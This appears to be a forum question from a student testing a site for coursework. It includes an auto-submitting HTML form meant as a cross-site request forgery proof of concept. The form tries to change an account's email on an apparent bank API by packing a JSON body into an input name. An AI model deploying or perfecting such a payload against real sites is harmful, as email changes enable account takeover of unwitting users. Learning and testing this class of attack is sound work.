So I'm testing this site for coursework and I think it might be vulnerable CSRF however when I try to make a post request I get a validation error which says "locale" is required despite me specifying it in the request. Here's the form source code.
<html>
<head>
</head>
<body>
<form action="http://account.testbank.com/api/account/v1/user/email" method="post" enctype='applicatiom/json'>
<input name='{"email":"testuser@gmail.com" ,"locale": "en"}'>
<input type="hidden" name="locale" id="locale" value="en-US">
<script> document.forms[0].submit()</script>
</form>
</body>
</html>
What am I doing wrong?